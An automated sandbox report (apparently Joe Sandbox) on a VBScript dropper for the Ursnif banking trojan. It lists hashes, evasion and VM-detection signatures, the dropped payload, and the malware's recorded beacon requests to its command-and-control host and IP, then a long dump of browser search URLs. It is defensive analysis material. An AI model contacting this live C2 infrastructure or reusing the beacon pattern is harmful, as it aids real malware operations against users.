Loading ...

Play interactive tourEdit tour

Analysis Report DGDvEtyCrEmX.vbs

Overview

General Information

Sample Name:DGDvEtyCrEmX.vbs
Analysis ID:288701
MD5:82cf315cdb889ef199a496166b75ae9d
SHA1:b80315de87e81434e64b55a2d620f5d13cacfd5a
SHA256:0c256d146ed7b8982afd6f101b42f01a9c8538e3e2187d7d889692eb296646da

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6792 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\DGDvEtyCrEmX.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 3888 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4852 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3888 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 7164 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 964 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7164 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.388410277.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.388483202.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.388462091.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.388313848.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.388384941.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 3 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Mardi.rmAvira: detection malicious, Label: TR/AD.UrsnifDropper.xehvx
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Mardi.rmVirustotal: Detection: 11%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Mardi.rmReversingLabs: Detection: 34%
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Joe Sandbox ViewIP Address: 8.208.101.13 8.208.101.13
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/4Sqd9epbzKerX/xMaPLIic/w1aJGgLYfiNImxsG5y7HUhj/V3aKUBMI40/DGOcC3ck_2FklPS0E/skMzuUWIPXYS/ywsRc4UZm_2/BHZaK_2FMELNHy/rvqdc18ebJ_2BNPw_2Fwt/BuWeGMN94djFO4ym/BWgpiq6kKV8o9lQ/rIRwMlcsRbNzY0jEob/R10Wg9rfn/tMewZ7N7SgG_2BBjRksS/i9PAdksuzbNh36wLisw/SfAKpCojDvpWR41T9gmDt3/a_2FZ8G_2FVkq/LVuB9Nj_/0A_0DEn9MrQNs10ebRdQxOM/RSwG4uo3a1/6x8VynoT/p9yXG1ksfG/8 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1qC/XCLiVM99aaG/WANtktDl66EkjA/Zg7EmyQ8WR10dwf5wmuj5/kl8Od1cU_2BgowAQ/BhcrAFgrpglQTCc/9PO5aV68hbyI_2Bci0/pwh_2FXRA/m0yZ6bPHSgfVP3N_2BfI/wwo9MVpC8U7spBhdHFU/65BFG9R0eyQ90npLpuPohs/UbouGRm_2B6gm/qpAA6kW4/nq9w_2BczRb_2Fy9G1_0A_0/Dg57uLpuGn/biJjuTpnWhTrLzYmW/40vxULO5WJfq/gVSKZYQjH9J/PdcQPqTLFhn/0saaZ3Z3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8e9b4cc0,0x01d6913d</date><accdate>0x8e9b4cc0,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8e9b4cc0,0x01d6913d</date><accdate>0x8ea01169,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8ecfc066,0x01d6913d</date><accdate>0x8ecfc066,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8ecfc066,0x01d6913d</date><accdate>0x8ecfc066,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8ed484f7,0x01d6913d</date><accdate>0x8ed484f7,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8ed484f7,0x01d6913d</date><accdate>0x8ed484f7,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Sep 2020 15:07:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: {B8659F81-FD30-11EA-90E8-ECF4BBEA1588}.dat.19.dr, ~DF297DC7DFA8CBF825.TMP.19.drString found in binary or memory: http://api10.laptok.at/api1/4Sqd9epbzKerX/xMaPLIic/w1aJGgLYfiNImxsG5y7HUhj/V3aKUBMI40/DGOcC3ck_2FklP
            Source: iexplore.exe, 0000001B.00000002.484082517.0000000000ACE000.00000004.00000020.sdmp, iexplore.exe, 0000001B.00000002.484805029.0000000000B03000.00000004.00000020.sdmpString found in binary or memory: http://api10.laptok.at/api1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
